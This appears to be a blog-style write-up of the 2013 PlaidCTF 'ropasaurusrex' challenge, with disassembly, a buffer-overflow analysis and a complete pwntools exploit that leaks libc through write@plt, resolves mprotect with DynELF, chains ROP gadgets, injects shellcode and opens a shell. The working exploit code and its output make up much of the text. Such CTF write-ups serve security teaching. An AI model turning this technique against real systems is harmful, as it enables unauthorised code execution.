A 2013 PlaidCTF challenge was called ropasaurusrex and it was a babys first challenge on Return Oriented Programming. It has been exhaustively documented how to solve this but all solutions I have seen assume that we know the libc that the binary runs under. In the original challenge we were actually given a copy of libc but I don’t like that and it is not necessary so my solution works without having a libc copy.

Also other solutions return to system("/bin/sh") or system("cat flag") or whatever which is both boring and limiting. I want shellcode execution!

The binary

The code for the binary is very short:

read_func:
        push   ebp
        mov    ebp,esp
        sub    esp,0x98
        mov    DWORD PTR [esp+0x8],0x100
        lea    eax,[ebp-0x88]
        mov    DWORD PTR [esp+0x4],eax
        mov    DWORD PTR [esp],0x0
        call   read
        leave
        ret

main:
        push   ebp
        mov    ebp,esp
        and    esp,0xfffffff0
        sub    esp,0x10
        call   read_func
        mov    DWORD PTR [esp+0x8],0x4
        mov    DWORD PTR [esp+0x4],0x8048510  ; "WIN\n"
        mov    DWORD PTR [esp],0x1
        call   write
        leave
        ret

A C version of the above might look like this:

#include <stdio.h>
void read_func(void) {
    char buffer[136];
    read(0, buffer, 256);
}

void main(void) {
    read_func();
    write(1, "WIN\n", 4);
}

The vulnerability should be obvious…​write 136 bytes to fill the buffer, the next four bytes will overwrite the saved ebp register and the next four will overwrite the return address.

So we own the return address and since raw bytes are read with read directly there are no bad bytes. We can write anything!

Strategy

So where should we return to?

A technique I use all the time is resolving symbols dynamically which pwntools helps us do using the DynELF class.

DynELF needs an arbitrary read primitive for resolving symbols and we can easily build one using the buffer overflow.

The read primitive takes an address as a parameter and should return at least one byte of data from that address but DynELF for 32 bit binaries usually reads four bytes at a time so if we can return four bytes in one go we should.

Our read primitive will overflow the buffer, overwrite the return address with the address of write@plt (which by the way is at a static address and works the same as returning to write in libc) with the given address as its read address, four as its length and stdout as its file descriptor.

Now to the really clever part…​the return address from this call will be read_func itself so we get another go at overflowing the buffer and another read.

We will use this read primitive to resolve the mprotect function in libc and do a last read which will mprotect a section of mapped memory to have readable+writable+executable, read a shellcode into this memory and then return to it. Simple, right?

If you run ropasaurusrex and read its /proc/<pid>/maps file you will see that 0x08049000 is mapped and is writable so we choose this as our destination for shellcode and the address to mprotect.

The exploit

The exploit is quite simple:

#!/usr/bin/env python2

from pwn import *
from time import sleep

context(arch = 'i386', os = 'linux')

r = process('./ropasaurusrex')

SHELLCODE = asm(shellcraft.sh())
RET_OFFSET = 140
READ_FUNC = 0x80483f4
MAIN_ELF = ELF('./ropasaurusrex')
MAPPED_ADDR = 0x08049000

#Read primitive for DynELF
def l(addr):
    AMOUNT_TO_READ = 4
    r.send(flat('A' * RET_OFFSET,          #Offset to return address
                MAIN_ELF.plt['write'],     #Return to write@plt
                READ_FUNC,                 #..back to read_func after write
                1, addr, AMOUNT_TO_READ    #Args to write
                ))
    return r.recv(AMOUNT_TO_READ) #Return the received data

#Resolve mprotect from libc
dynelf = DynELF(l, elf=MAIN_ELF)
mprotect = dynelf.lookup('mprotect', 'libc')

#Build ROP chain for mprotect, read shellcode and jumping to shellcode
rop = ROP(MAIN_ELF)
rop.call(mprotect, (MAPPED_ADDR, len(SHELLCODE), 7))
rop.read(0, MAPPED_ADDR, len(SHELLCODE))
rop.call(MAPPED_ADDR)

#Send ROP chain
r.send(flat('A' * RET_OFFSET, rop.chain()))
#...shellcode must be sent separately
sleep(0.1)
#Send shellcode
r.send(SHELLCODE)
#aaand have a shell
r.interactive()

And it works:

$ ./exploit.py
[+] Starting local process './ropasaurusrex': Done
[*] '/home/robert/code/ROP/ropasaurusrex'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE
[+] Loading from '/home/robert/code/ROP/ropasaurusrex': 0xf7784918
[+] Resolving 'mprotect' in 'libc.so': 0xf7784918
[!] No ELF provided.  Leaking is much faster if you have a copy of the ELF being leaked.
[*] Trying lookup based on Build ID: 94ab3e046784e5da65532a9aded8555c3bdc3778
[*] .gnu.hash/.hash, .strtab and .symtab offsets
[*] Found DT_GNU_HASH at 0xf7731de0
[*] Found DT_STRTAB at 0xf7731de8
[*] Found DT_SYMTAB at 0xf7731df0
[*] .gnu.hash parms
[*] hash chain index
[*] hash chain
[*] Loaded cached gadgets for './ropasaurusrex'
[*] Switching to interactive mode
$ cat flag
Yes, you've got a shell!

I chose a simple shellcode that only gave me a shell but I could have used a stager and run an advanced multi megabyte payload. Simply returning to system("/bin/sh") would not let us do that.